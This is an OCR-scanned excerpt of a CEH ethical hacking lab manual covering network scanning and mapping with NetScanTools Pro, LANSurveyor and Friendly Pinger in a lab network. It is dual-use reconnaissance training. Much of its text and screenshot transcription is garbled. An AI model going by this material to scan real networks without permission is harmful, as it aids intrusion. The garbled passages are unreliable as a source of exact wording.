m
Pro»ucuou5 Mode S<onr ^
1 103 I oca ARP Scat

□ D 3 S * ‫׳‬E.fc8\S5car
F‫־‬r»01 » * Tools
□ Do Sulnel M ai: Sea‫!־‬
Arthit Oil cover? Tools
EnaSfc Post-Scan
Pais** Discovery Tools M O b lg of
DNS Too 11 rton-Resso'dn; P s

S*‫׳‬J «I L c rtl Tool I | irw : »vu«:

M e m * Tools
I Oeof IwpQUr t tn»
Pfogr•!* info

FIGURE 7.12: Result of sail IP address

18. C li c k Port scan n er i n t h e l e f t p a n e l . A w i n d o w w ill a p p e a r w i t h

i n f o r m a t i o n a b o u t d i e p o r t s c a n n e r t o o l . C li c k OK
- _ l n l x ‫ך‬
F test NetScanTod‘ $ Pro Demo Version Build 8-17-12 based on version 11.19
F ie Edit Acceuibilrty View IPv6 Help

ri1h 3■‫>ב‬I^
Welcome unnei/N etSiannei 9
•,‫׳‬u tw ateO Tooli
M «nu«ITouu lair
About the Poit Scanner Iool \
NEVER SCAN A COMPUTER YOU DO NOT OWN OR HAVE THE OWNER’S PERMISSION TO SCAN.

• use rtm ‫ ז‬ool to scan j taro** for ICP or ‫ יוגווו‬ports that .‫ מור‬iKrrnang (open wirh senna*
noo tnrunced fcstenino).
Whois is a client utility • lypes of scanning supported ruli Connect TCP Scan (see notes below}. U0P port u'reachasle
scan, combined tu> ful connect and uop scan, TCP SYN only scan and tcp orrer
son.
that acts as an interface to a • Don't miss this special feature in this tool: After a target has bee scanned, an a‫״‬alfss .vineow
will open in >our Oeh J t web browser.
remote whois server • Don't fo rg e t ‫ מז‬nght c*<k n we resjits for 3 menu with more options.
database. This database
P nq Scanner Notes: settings that strongly affect scan speed:
may contain domain, IP • Come:San Timeout. use 200c* less on a fact networkcorrection yjdhneaiby cor‫״‬p.te i. - « 3 ) 3003 ‫ ־‬seconds) or
more ona dau: cameao‫־׳‬.
address or AS Number • Wot After Connect -J i s c-110•• o5 ‫־׳‬each port test worts before deodng that ih ; port is not 5c»»e.
registries that you can • settirxcAXbv settee* ccmccxns. Try0, (hen (ry lire. Notice the dfference.
Port Scanner
• SetOnqs^ax°«<MConnectors
access given the correct
query U
P =f»»cu0\j1 Mode ‘
Domo KmlUtlons.
• Hone.

FIGURE 7.13: selecting Port scanner option

19. E n t e r t h e I P A d d r e s s i n t h e Target Hostnam e or IP Address f i e ld a n d

s e l e c t t h e T C P Ports only r a d i o b u t t o n

2 0 . C li c k S ca n Range of Ports

C EH Lab Manual Page 149 Ethical Hacking and Countermeasures Copyright O by EC ‫־‬Counc11
All Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

test - NetScanTools® Pro Demo Version Build 8-17-12 based on version 11.19 1-1°‫׳ ״ ־‬
fte Ed* Accessibility View 6‫י\)ו‬ Help

Manual Fools - Port Scanner ^

Automated Tool?
T3r0ut HKTSire 3r P A:d‫־‬£S3 Pore Range are! Sarvfcafc
Manual Toots (alij
I10.0-01 I I • ■ 'T C P P o r t s I
LDP P 3te Cny A npTO AutOHHted |
Start 1
m WARNING: the- to d scan? r * rargrfr- ports. B'd f a
O TCP4UJP Ports ( I
O t cpsyn
Scan C irp lrtr. OlCPaMM □^to^ont•
Sea‫ ״‬R.anoc of ! v s Show Al S an r« d Ports, Actlvi 0! Not

St * ‫י‬ Comnon Path P o rt P o r t Dvac P r o to c o l R r » u lt» O a t• ft• » .v » d

80 h te p TCP P o r t A c tiv e
| E d tc o n w ■ Part{ Let

Poit Scanner

J
Pro«ucuom Mode ‘
MrPasp :-ir-^acr :‫־‬
10.D.0.
f3vor1t* Tools Comect T rcout
A<t*‫«׳‬DtscoreryTools ( 100D= !second]
Passr* Discoverytools :
DNS roois
watAfte'Conncc
p«*«ttml loon (ICOO -1 s*aofl
txtemji tools
programinro :

FIGURE 7.14: Result of Port scanner

L a b A n a ly s is

D o c u m e n t a ll d i e I P a d d r e s s e s , o p e n a n d c lo s e d p o r t s , s e r v ic e s , a n d p r o t o c o l s y o u
d is c o v e r e d d u r i n g d i e la b .

T o o l/U tility I n f o r m a tio n C o lle c te d /O b je c tiv e s A c h ie v e d

A R P S c a n R e s u lts :

■ IP v 4 A d d re ss
■ M A C A d d re ss
■ I / F M a n u fa c tu re r
■ H o s tn a m e
■ E n try T y p e
■ L o c a l A d d re ss
N e tS c a n T o o ls
p ro In f o r m a tio n fo r D is c o v e r e d D H C P S e rv e rs:

■ I P v 4 A d d r e s s : 1 0 .0 .0 .7
■ I n t e r f a c e D e s c r i p t i o n : H y p e r-V V irtu a l
E th e r n e t A d a p te r # 2
■ D H C P S e r v e r I P : 1 0 .0 .0 .1
■ S e r v e r H o s t n a m e : 1 0 .0 .0 .1
■ O f f e r e d I P : 1 0 .0 .0 .7
■ O f f e r e d S u b n e t M a s k : 2 5 5 .2 5 5 .2 5 5 .0

C EH Lab Manual Page 150 Ethical Hacking and Countermeasures Copyright O by EC-Coundl
All Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO

THIS LAB.

Q u e s t io n s

1. D o e s N e t S c a i i T o o l s P r o s u p p o r t p r o x y s e r v e r s o r fire w a lls ?

In te rn e t C o n n e c tio n R e q u ire d

□ Y es 0 No

Pla tfo rm Supported

0 C lassroom 0 iLabs

C EH Lab Manual Page 151 Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
 M o d u le 0 3 - S c a n n in g N e tw o rk s

Drawing Network Diagrams Using

LANSurveyor
l^42\s/nvejordiscoversa nehvorkandproducesa comprehensivenehvork diagram
thatintegrates OSILayer2 andLajer 3 topologydata.
I CON K E Y L a b S c e n a r io
27 Valuable
A i l a tt a c k e r c a n g a t h e r i n f o r m a t i o n f r o m A R P S c a n , D H C P S e r v e r s , e tc . u s i n g
information
N e t S c a n T o o l s P r o , a s y o u h a v e l e a r n e d i n d i e p r e v i o u s la b . U s i n g d iis i n f o r m a t i o n
Test your a n a tt a c k e r c a n c o m p r o m i s e a D H C P s e r v e r 0 1 1 t h e n e tw o r k ; t h e y m i g h t d i s r u p t
knowledge
n e t w o r k s e r v ic e s , p r e v e n t i n g D H C P c lie n ts f r o m c o n n e c t i n g t o n e t w o r k r e s o u r c e s .
‫ס‬ Web exercise B y g a in i n g c o n t r o l o f a D H C P s e r v e r , a tt a c k e r s c a n c o n f i g u r e D H C P c lie n ts w i t h
f r a u d u l e n t T C P / I P c o n f i g u r a t i o n i n f o r m a t i o n , in c l u d in g a n in v a lid d e f a u l t g a te w a y
m Workbook review o r D N S s e r v e r c o n f i g u r a t io n .

111 d ii s la b , y o u w ill l e a r n t o d r a w n e t w o r k d ia g r a m s u s i n g L A N S u r v e y o r . T o b e a n
e x p e r t network administrator a n d penetration te s te r y o u n e e d t o d is c o v e r
n e t w o r k t o p o l o g y a n d p r o d u c e c o m p r e h e n s i v e n e t w o r k d ia g r a m s f o r d is c o v e r e d
n e tw o r k s .

L a b O b j e c t iv e s

T h e o b je c t iv e o f d iis la b is t o h e l p s t u d e n t s d is c o v e r a n d d ia g r a m n e t w o r k to p o l o g y
a n d m a p a d is c o v e r e d n e t w o r k

1 1 1 d iis la b , y o u n e e d to :

■ D ra w ’ a m a p s h o w i n g d i e lo g ic a l c o n n e c t iv it y o f y o u r n e t w o r k a n d n a v ig a te
a r o u n d d ie m a p

■ C r e a te a r e p o r t d i a t in c lu d e s a ll y o u r m a n a g e d s w itc h e s a n d h u b s

C EH Lab Manual Page 152 Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
 M o d u le 0 3 - S c a n n in g N e tw o rk s

ZZy Tools L a b E n v ir o n m e n t
demonstrated in
T o p e r f o r m d i e la b , y o u n e e d :
this lab are
available in ■ L A N S u r v e y o r l o c a t e d a t D:\CEH-Tools\CEHv8 Module 03 Scanning
D:\CEH- Networks\Network Discovery and Mapping Tools\LANsurveyor
Tools\CEHv8
■ Y o u c a n a ls o d o w n l o a d t h e l a t e s t v e r s i o n o f LAN Surveyor f r o m d i e l i n k
Module 03
Scanning h ttp : / / w w w .s o la r w i11d s . c o m /
Networks ■ I f y o u d e c id e t o d o w n l o a d d i e la t e s t v e r s i o n , d i e n s c r e e n s h o t s s h o w n i n d i e
la b m i g h t d if f e r

■ A c o m p u t e r r u n n i n g Windows Server 2012

■ A w e b b ro w s e r w id i In te r n e t a ccess

■ A d m in i s t r a ti v e p riv ile g e s t o m i l d i e LANSurveyor t o o l

L a b D u r a t io n

T im e : 1 0 M i n u te s

O v e r v ie w o f L A N S u r v e y o r

S o la r W in d s L A N s u r v e y o r a u to m a tic a lly d is c o v e r s y o u r n e t w o r k a n d p r o d u c e s a
c o m p r e h e n s i v e network diagram t h a t c a n b e e a sily e x p o r t e d t o M i c r o s o f t O f f i c e
V is io . L A N s u r v e y o r a u to m a tic a lly d e te c ts new devices a n d c h a n g e s t o network
topology. I t s im p lifie s i n v e n t o r y m a n a g e m e n t f o r h a r d w a r e a n d s o f tw a r e a s s e ts ,
a d d r e s s e s r e p o r t i n g n e e d s f o r P C I c o m p l i a n c e a n d o t h e r r e g u l a to r y r e q u i r e m e n ts .

TASK 1 Lab T asks

Draw Network I n s ta ll L A N S u r v e y o r o n y o u r Windows Server 2012
Diagram
F o l l o w d i e w i z a r d - d r iv e n in s ta l la t io n s te p s a n d in s ta ll L A N S u r v y o r .

1. L a u n c h t h e S ta rt m e n u b y h o v e r i n g d i e m o u s e c u r s o r i n t h e l o w e r - l e f t
c o rn e r o f th e d e s k to p

4 W indow s Server 2012

* I S M fcnar X ltl(Wmw CjnMditt

(*akrtun lopy. lull) •40:

FIGURE 8.1: Windows Server 2012 - Desktop view

2. C li c k t h e LANSurvyor a p p t o o p e n t h e LANSurvyor w i n d o w

C EH Lab Manual Page 153 Ethical Hacking and Countermeasures Copyright © by EC ‫־‬Coundl
All Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

LANsurveyor's
Responder client Manage S ta rt A d m in istra to r £

remote Window’s, Linus,

and Mac OS nodes from
the LANsurveyor map, S e rw
M o ra le r
Windows
PowetShd
G oo*
Chrwne
H»p«V
1•■,XU j .
IANmny...

including starting and

stopping applications and b m o 91 ■
distributing files
Panal

Q w

w :a
e
rwn«t hptom ‫ף״‬ l i

MegaPing NMScanL.
Pto Demo

*s

FIGURE 8.2 Windows Server 2012 - Apps

3. R e v i e w t h e l i m i t a t i o n s o f t h e e v a l u a t i o n s o f t w a r e a n d t h e n c li c k
Continue w ith Evaluation t o c o n t i n u e t h e e v a l u a t i o n
S olarW in ds LA N surveyor ‫ ן‬- ‫יי * ים י‬
TFile Edit Men aye Monitor Report Tods Window Help

s o la rw in d s

^ LANsurveyor uses an
almost immeasurable
amount of network
bandwidth. For each type
of discovery method
(ICMP Ping, NetBIOS,
SIP, etc.)

FIGURE 8.3: LANSurveyor evaluation window

4. T h e Getting Started w ith LANsurveyor d i a l o g b o x is d is p la y e d . C li c k

S ta rt Scanning Network

C EH Lab Manual Page 154 Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

r Getting Started with LANsurveyor ■ a u

so larw in d s7'

What you can do with LANsurveyor.

S can and map Layer 1. 2. 3 network topology

&] Export maps to Microsoft Vtito » V ie w exam ple mgp

"2 Continuously scan your network automatically

f i LANsurveyor uses a
number of techniques to Onca aavod, a I cuatom ‫׳‬nap■a car be uotd m SelarV/nda not/.o‫׳‬k and opplcotor
map managed switch/hub management software, learn more »
V/atch a vdae nt'oto barn more
ports to their
corresponding IP address
nodes. It's important to » thwack LANsurveyor forum
remember switches and thwack is 8 community site orovidiro SobrtVrds js e ‫־‬s with useful niomaton. toos and vauable reso jrces
hubs are Layer 2 (Ethernet
» Qnfcne Manual
address) devices that don't For additional hep on using the LAIJsu‫־‬veyor read the LANSurveyor Administrator Gude
have Layer 3 (IP address)
information. » Evaluation Guide
1
Tha LAMaurvayor Evaiuabon Guida prcvdaa an irtr»d »cton to LAMaurvayor faaturaa ard ratnicbcna fer nataltng. confgurnj, and
jsmg LAHsurveyor.

» Support
TheSohrwinds Supoorl W et»i» offer* a senprehersve set of tool* tc help you nanaoea^d nartaai yo»r SohrWind* appleations
v b t tne <]1a w js a i£ .g a 2 s , r ic q y y r ty Q vy»t9»». o r Jp o a ic

Start Scanrir.g Neta 0 *1:

I I Don't show agah ] [

FIGURE 8.4: Getting Started with LANSurveyor Wizard

5. T h e Create A Network Map w i n d o w w ill a p p e a r s ; i n o r d e r t o d r a w a

n e t w o r k d i a g r a m e n t e r t h e I P a d d r e s s i n Begin Address a n d End
Address, a n d c li c k Sta rt Network Discovery

C EH Lab Manual Page 155 Ethical Hacking and Countermeasures Copyright O by EC ‫־‬Coundl
All Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

Create A New Network Map ‫מ־‬

NetuioikParaneetr
Eecin Acdres; E rd Address
10.00.1 10.D.0.254
Enter Ke>t Address Here Hops

(Folowtrg cuter hopj requires SN M P rouier access!

Rotfers. Switches and □ her SN M P Device Dijcovery

■-M* 0 S N M P v l D * v k # j ••S M M P /I Community Strng(*)

=‫=&־‬ [ ptfefc private

Q S H W P v 2 c Devices •• SN M Pv2 c Community Strngfs)

| pubiu. pmats
—LANsurveyor's network □ SNK‫׳‬Pv3Devbe5 I SNMPv3 Options..
discovery discovers aU
network nodes, regardless
Other IP Service Dixovery
of whether they are end
nodes, routers, switches or Ivi lANsuveya F e j pender;

any other node with an IP 1j P LAN survefor Responder Password:

address
0 IC M P (P r g )

0 N e l8 IC S Clwvs

M S P Clients I I A ctve Directory DCs

Mapping Speed

Slower Faster
0
ConfigurationMa^aperon*
Save0KcovetyConfgwa‫׳‬ion. I D isco ver Configuafon..

| Cored Start Notv»o*k Dioco/cry

FIGURE 8.5: New Network Map window

6. T h e e n t e r e d I P a d d r e s s mapping process w ill d i s p l a y a s s h o w n i n t h e

fo llo w in g fig u re

Mapping Progress

Searching for P nodes

HopO: 10.0.0.1-10.0.0.254

SNMP Sends
SNMP R ecess:
03 LANsurveyor rs Last Node Contacted:
capable o f discovering ICMP Ping Sends:
and mappmg multiple ICMP Receipts
VLANs on Layer 2. For Subnets Mapped
example, to map a Nodes Mapped WIN-D39MR5HL9E4
switch connecting Routers Mapped
multiple, non- Switches Mapped
consecutive VLANs
Cancel

FIGURE 8.6: Mapping progress window

7. LAN surveyor d is p la y s d i e m a p o f y o u r n e t w o r k

C EH Lab Manual Page 156 Ethical Hacking and Countermeasures Copyright O by EC ‫־‬Counc11
All Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

S c la A V in d s LA N su rv eyo r - [M a p 1] | ^ = X

■ Me Edit Manage Monitor Report Tools Avdow Help -H

♦ ‫׳‬ |
Q LANsurveyor ‫נ‬ & h a> j 1* 1 51 v s 3 a 0 a s r& © s o la rw in d s •‫׳‬
Responder Clients greatly K H ‘> e ©. id ‫* ״י|| ; ס‬ v
enhance the functionality E tf=d Network Segments (1} ‫־־‬
of LANsurveyor by ff £ P Addresses (4) 111
Domain Names (4)
providing device inventory
and direct access to
networked computers.
-4
M
Node Names (4)
fP Reuter
LANsurveyor Responder Nodes
Wti '.'SilLC M W I
Wf.-WSC'tlXMK-O
veisor
W1N-DWlllR»lLSt4
WIN D3JI H5HJ* « O vervie w f*~|
SNMP Nodes
ffc- SNMP SvntchesHubs
hC 0
SIP (V IPJ Nodes
as Layer i Nodes
*ft Active Directory DCs
Groups

­ ‫נ‬.‫נ‬.0.0- • (.0.0.255

‫ ׳‬non•'
■ 10091
‫״‬V*4 UCONJWRSfWW
MN-LXQN3WRJNSN
10006
-
12-

FIGURE 8.7: Resulted network diagram

L a b A n a ly s is

D o c u m e n t all d ie I P a d d r e s s e s , d o m a i n n a m e s , n o d e n a m e s , I P r o u t e r s , a n d S N M P
n o d e s y o u d i s c o v e r e d d u r i n g d i e la b .

T o o l/U tility I n f o r m a tio n C o lle c te d /O b je c tiv e s A c liie v e d

I P a d d r e s s : 1 0 .0 .0 .1 - 1 0 .0 .0 .2 5 4

I P N o d e s D e ta ils :

■ S N M P S en d - 62
■ I C M P P i n g S e n d 31‫־‬
■ I C M P R e c e ip ts 4 ‫־‬
L A N S u rv e y o r
■ N odes M apped 4 ‫־‬

N e tw o r k s e g m e n t D e ta ils :

■ IP A d d re ss - 4
■ D o m a in N a m e s - 4
■ N ode N am es - 4

C EH Lab Manual Page 157 Ethical Hacking and Countermeasures Copyright O by EC ‫־‬Coundl
All Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

Y O U R I N S T R U C T O R IF YOU H A V E Q U E S T I O N S RELATED TO
T H I S LAB.

Q u e s t io n s

1. D o e s L A N S u i v e y o r m a p e v e r y I P a d d r e s s t o its c o r r e s p o n d i n g s w it c h o r
h u b p o rt?

2. C a n e x a m i n e n o d e s c o n n e c t e d v ia w ir e le s s a c c e s s p o i n t s b e d e t e c t e d a n d
m apped?

I n te rn e t C o n n e c tio n R e q u ire d

□ Yes 0 No

Platfo rm Supported

0 C lassroom 0 iL a b s

C EH Lab Manual Page 158 Ethical Hacking and Countermeasures Copyright © by EC-Council
AB Rights Reserved. Reproduction is Strictly Prohibited.
 M o d u le 0 3 - S c a n n in g N e tw o rk s

Mapping a Network Using Friendly

Pinger
Friendly Pingeris a user-friendlyapplicationfor netirork administration, monitoring,
andinventory.
I CON K E Y L a b S c e n a r io
27 Valuable
111 d i e p r e v i o u s la b , y o u f o u n d d i e S N A I P , I C M P P in g , N o d e s M a p p e d , e tc . d e ta ils
information
u s i n g d i e t o o l L A N S u i v e y o r . I f a n a tt a c k e r is a b le t o g e t a h o l d o f th is in f o r m a t i o n ,
Test your h e o r s h e c a n s h u t d o w n y o u r n e t w o r k u s i n g S N M P . T h e y c a n a ls o g e t a lis t o f
knowledge
in t e r f a c e s 0 1 1 a r o u t e r u s i n g d i e d e f a u l t n a m e p u b li c a n d d is a b le d i e m u s i n g d i e r e a d -
‫ס‬ Web exercise w r ite c o m m u n it y . S N M P M I B s in c l u d e i n f o r m a t i o n a b o u t t h e i d e n t i t y o f t h e a g e n t's
h o s t a n d a tt a c k e r c a n ta k e a d v a n ta g e o f d iis i n f o r m a t i o n t o in itia te a n a tta c k . U s in g
m Workbook review d i e I C M P r e c o n n a i s s a n c e te c h n i q u e a n a tt a c k e r c a n a ls o d e t e r m i n e d i e t o p o l o g y o f
d i e t a r g e t n e t w o r k . A tta c k e r s c o u l d u s e e i t h e r d i e I C M P ,’T i m e e x c e e d e d " 0 1 ‫־‬
" D e s tin a tio n u n re a c h a b le " m e ssa g e s. B o d i o f d ie s e I C M P m e s sa g e s c a n c a u se a
h o s t t o im m e d i a te l y d r o p a c o n n e c t i o n .

A s a n e x p e r t Network Administrator a n d Penetration T e ste r y o u n e e d t o d i s c o v e r

n e t w o r k t o p o l o g y a n d p r o d u c e c o m p r e h e n s i v e n e t w o r k d ia g r a m s f o r d is c o v e r e d
n e t w o r k s a n d b lo c k a tt a c k s b y d e p lo y i n g fire w a lls 0 1 1 a n e t w o r k t o filte r u n - w a n t e d
tra ffic . Y o u s h o u l d b e a b le t o b l o c k o u t g o i n g S N M P tr a f f ic a t b o r d e r r o u t e r s o r
fire w a lls. 111 d iis la b , y o u w ill l e a n i t o m a p a n e t w o r k u s i n g d ie t o o l F r i e n d ly P in g e r .

L a b O b j e c t iv e s

T h e o b je c t iv e o f d iis la b is t o h e l p s t u d e n t s d i s c o v e r a n d d ia g r a m n e t w o r k t o p o l o g y
a n d m a p a d is c o v e re d n e tw o r k

h i d iis la b , y o u n e e d to :

■ D i s c o v e r a n e t w o r k u s i n g discovery te c h n i q u e s

■ D i a g r a m t h e n e t w o r k to p o l o g y

■ D e t e c t n e w d e v ic e s a n d m o d i f i c a ti o n s m a d e i n n e t w o r k t o p o l o g y

■ P e r f o r m i n v e n t o r y m a n a g e m e n t f o r h a r d w a r e a n d s o f tw a r e a s s e ts

C EH Lab Manual Page 159 Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

L a b E n v ir o n m e n t

ZZ7 Tools T o p e r f o r m d i e la b , y o u n e e d :
demonstrated in
■ F r i e n d ly P i n g e r l o c a t e d a r D:\CEH-Tools\CEHv8 Module 0 3 Scanning
this lab are
Networks\Network Discovery and Mapping Tools\FriendlyPinger
available in
D:\CEH- ■ Y o u can also download die latest version o f Friendly Pinger from the
Tools\CEHv8 link http://www.kilierich.com/fpi11ge17download.htm
Module 03
Scanning ■ I f y o u d e c id e t o d o w n l o a d t h e la t e s t v e r s io n , d i e n s c r e e n s h o t s s h o w n i n d i e
Networks la b m i g h t d if f e r

■ A c o m p u t e r r u n n i n g Windows Server 2 0 1 2

■ A w e b b ro w s e r w id i I n te rn e t a ccess

■ A d m in i s t r a ti v e p riv ile g e s t o r u n d i e Friendly Pinger t o o l

L a b D u r a t io n

T im e : 1 0 M i n u te s

O v e r v ie w o f N e t w o r k M a p p in g

N e t w o r k m a p p i n g is d i e s t u d y o f d i e p h y s ic a l connectivity o f n e tw o r k s . N e t w o r k
m a p p i n g is o f t e n c a r r ie d o u t t o discover s e r v e r s a n d o p e r a t i n g s y s te m s r u i n i n g o n
n e tw o r k s . T h i s te c l u ii q u e d e te c ts n e w d e v ic e s a n d m o d i f i c a ti o n s m a d e i n n e t w o r k
t o p o lo g y . Y o u c a n p e r f o r m i n v e n t o r y m a n a g e m e n t f o r h a r d w a r e a n d s o f tw a r e
a s s e ts .

F rie n d ly P in g e r p e r f o r m s th e fo llo w in g to m a p th e n e tw o rk :

■ Monitoring n e t w o r k d e v i c e s a v a il a b il it y

■ Notifies i f a n y s e r v e r w a k e s o r g o e s d o w n

■ Ping o f a ll d e v i c e s i n p a r a l l e l a t o n c e

■ Audits hardw are a n d softw are c o m p o n e n t s i n s t a l l e d o n t h e c o m p u t e r s

o v e r th e n e tw o rk

Lab T asks

1. I n s ta ll F r i e n d ly P i n g e r 0 x1 y o u r Windows Server 2012

2. F o l l o w d i e w iz a r d - d r iv e n in s ta l la t io n s te p s a n d in s ta ll F r i e n d ly P in g e r .
task 1
3. L a u n c h t h e Sta rt m e n u b y h o v e r i n g d ie m o u s e c u r s o r i n d i e lo w e r - le f t
Draw Network c o rn e r o f th e d e s k to p
Map

C EH Lab Manual Page 160 Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
 M o d u le 0 3 - S c a n n in g N e tw o rk s

FIGURE 9.1: Windows Server 2012 - Desktop view

4. C li c k t h e Friendly Pinger a p p t o o p e n t h e Friendly Pinger w i n d o w

S ta r t A d m in is tra to r ^

^ You are alerted when Sen*r Windows GOOQte W**r-V Uninstall

M anager PowerSMI Chrome
nodes become
unresponsive (or become r _ m * % &
responsive again) via a
variety of notification C om piler Control
Panol
Hyp«-V

methods. Mac f.inf .

V 9 «

Command M02111a Patti

Prompt Firefox A ra^zer
£ Pro 2.7
Eaplewr !‫ר״‬ €> i l
■ Km
SeorchO. Fnendty
PW^er
Friendly Pinger will
display IP-address of your O rte f o fl*
IG
computer and will offer an
exemplary range of IP- FIGURE 9.2 Windows Server 2012 - Apps
addresses for scanning
5. T h e Friendly Pinger w i n d o w a p p e a r s , a n d F r i e n d l y P i n g e r p r o m p t s y o u
to w a tc h a n o n lin e d e m o n s tr a tio n .

6. C li c k No
& To see the route to a

‫ם‬
H
device, right-click it, select Friendly Pinger [Demo.map] 1
file Edit View Pinq Notification Scan FWatchcr Inventory Help
"Ping, Trace" and then
"TraceRoute". 1‫& □ צ‬£ - y a fit ‫*־‬
In the lower part of the V Denro
map a TraceRoute dialog *
window will appear. ‫׳‬
In the process of D em ons tra tio n
determination of the
intermediate addresses, m ap
they will be displayed as a
list in this window and a
route will be displayed as
red arrows on the map

Internet M.ui
S hull cut Sm v ti
S -
W oik Statio n
Workstation
(*mall)
-
dick the client orco to add ‫ ג‬new device... ^ 2 1 /2 4 /3 7 & OG 00:35
FIGURE 9.3: FPinger Main Window

C EH Lab Manual Page 161 Ethical Hacking and Countermeasures Copyright O by EC ‫־‬Counc11
All Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

7. S e l e c t File f r o m t h e m e n u b a r a n d s e l e c t d i e Wizard o p t i o n

r Friendly Pinger [Demo.map] L-!»j x ‫׳‬

File | Edit View Ping Notification Scan F/fatdier Inventory Help
‫ ם‬Scanning allows you to *‫ י‬C
‫*־‬%!‫ צ‬ft x
know a lot about your □ WeA CtrUN
network. Thanks to the Gtfr Open... Ct11+0
unique technologies, you Reopen
may quickly find all the | Uadate CtrhU
HTTP, FTP, e-mail and U Save.. C tfU S
other services present on Sava At...
your network Close
t b Close All

‫ מ‬g
‫ קד‬m
fcV Save A j Image...
^ Print...

^ Lock... Ctrl* B
^ Create Setup...
5T In la n d
fr! S c iy c i
0 Options... F9

X L Frit Alt*■)( Imen-pr H ail

Hob ----- S h o itcu l Se n w r
Mndpn
JJ
W n f k S t A lio n

a W in k S ta tiu n
I 1,11 |
r'r;m

CiedtOdllinitialllldL
C] Map occupies the most
part of the window. Right- FIGURE 9.4: FPinger Staiting Wizard
click it. In the appeared
contest menu select "Add” 8. T o c r e a t e i n i t i a l m a p p i n g o f t h e n e t w o r k , t y p e a r a n g e o f IP addresses
and then ‫״‬Workstation". A
i n s p e c i f i e d f i e ld a s s h o w n i n t h e f o l l o w i n g f i g u r e c li c k Next
Device configuration dialog
window will appear. Specify
the requested parameters:
Wizard ---
device name, address,
description, picture
Local IP address: 10.0.0.7

The initial map will be created by query from DNS-server

the information about following IP-addresses:

10.0.0.1•2d
You can specify an exacter range of scanning to speed up
this operation. For example: 10.129-135.1 •5.1 •10

| I Timeout 1000
The device is displayed Timeout allows to increase searching,
as an animated picture, if it but you can miss some addresses.
is pinged, and as a black
and white picture if it is not
pinged

? Help 4* gack =►Mext X Cancel

FIGURE 9.5: FPinger Intializing IP address range

9. T h e n t h e w i z a r d w ill s t a r t s c a n n i n g o f IP addresses 111 d i e n e t w o r k , a n d

li s t t h e m .

1 0 . C li c k Next

C EH Lab Manual Page 162 Ethical Hacking and Countermeasures Copyright O by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

Wizard

IP address Name
0 10.0.0.2 W1N-MSSELCK4K41
0 10.0.0.3 W indows8
0 10.0.0.5 W1N-LXQN3WR3R9M
□ 10.0.0.7 W1N-D39MR5HL9E4

£L) Press CTRL+I to get

more information about
the created map. You will
see you name as the map
author in the appeared
dialog window
The inquiry is completed. 4 devices found.

R em o ve tick from devices, which you

d on t want to add on the map

? Help 4* B ack 3 ‫ ►־‬N ext X C ancel

FPinger 9.6: FPmger Scanning of Address completed

11. Set the default options in the Wizard selection windows and click Next

Wizard
£0 Ping verifies a
connection to a remote
host by sending an ICMP Q e v i c e s ty p e: W orkstation
(Internet Control Message
Protocol) ECHO packet to
Address
the host and listening for
an ECHO REPLY packet.
OUse IP-address
A message is always sent to | ® Use DNS-name |

an IP address. If you do
not specify an address but a Name
hostname, this hostname is ‫ח‬ Remove DNS suffix
resolved to an IP address
using your default DNS
server. In this case you're
vulnerable to a possible
Add* ion
invalid entry on your DNS
(Domain Name Server) OA dd devices to the new map
server. (•> Add devices to the current map

7 Help !► Next X Cancel

FIGURE 9.7: FPinger selecting the Devices type

12. T h e n t h e c l i e n t a r e a w ill d is p la y s t h e N e t w o r k m a p i n t h e FPinger

w in d o w

C EH Lab Manual Page 163 Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

V Friendly Pinger [Default.map] _ □1 x ‫י‬

File Edit View/ Ping NotificaTion Scan FWatcher inventory Help

H ‫>׳״‬ £ ft J* & g
‫ ם‬If you want to ping
inside the network, behind
the firewall, there will be no
problems If you want to
ping other networks behind
the firewall, it must be
configured to let the ICMP
packets pass through. Your
network administrator
should do it for you. Same
with the proxy server.

FIGURE 9.8 FPmger Client area with Network architecture

13. T o s c a n th e s e le c te d c o m p u te r in th e n e tw o r k , s e le c t d ie c o m p u te r a n d
s e l e c t t h e Sca n t a b f r o m t h e m e n u b a r a n d c li c k Scan

F rie n d ly P in g e r [D e fa u lt.m a p ]

file Edit View Ping Notification Scan F W rtc h p Inventory Help

M Scan..
^ You may download the Lb ‫ם‬ - y a * e ? F61 50* m
latest release:
http: / / www. kilievich.com/
fpinger■

click the clicnt area to add c new devicc.. 233:1 S i. 3/4/4 ^ 00:00:47

Q Select ‫״‬File | Options,

and configure Friendly FIGURE 9.9: FPinger Scanning the computers in the Network
Pinger to your taste.
14. I t d is p la y s scanned details i n t h e Scanning w i z a r d

C EH Lab Manual Page 164 Ethical Hacking and Countermeasures Copyright O by EC ‫־‬Counc11
All Rights Reserved. Reproduction is Strictly Prohibited
 M o d u le 0 3 - S c a n n in g N e tw o rk s

Scanning

Service Compute Command f a

& ] HTTP W1N-MSSELCK... h ttp://W IN -M S S ELC X 4M 1
£ ] HTTP W1N-D39MR5H... http://W IN -D39M R5H L9E 4

£□ Double-click tlie device

to open it in Explorer.

S c a n n in g c o m p le te

Progress ^‫׳‬J Bescan

? Help y ok X Cancel

FIGURE 9.10: FPinger Scanned results

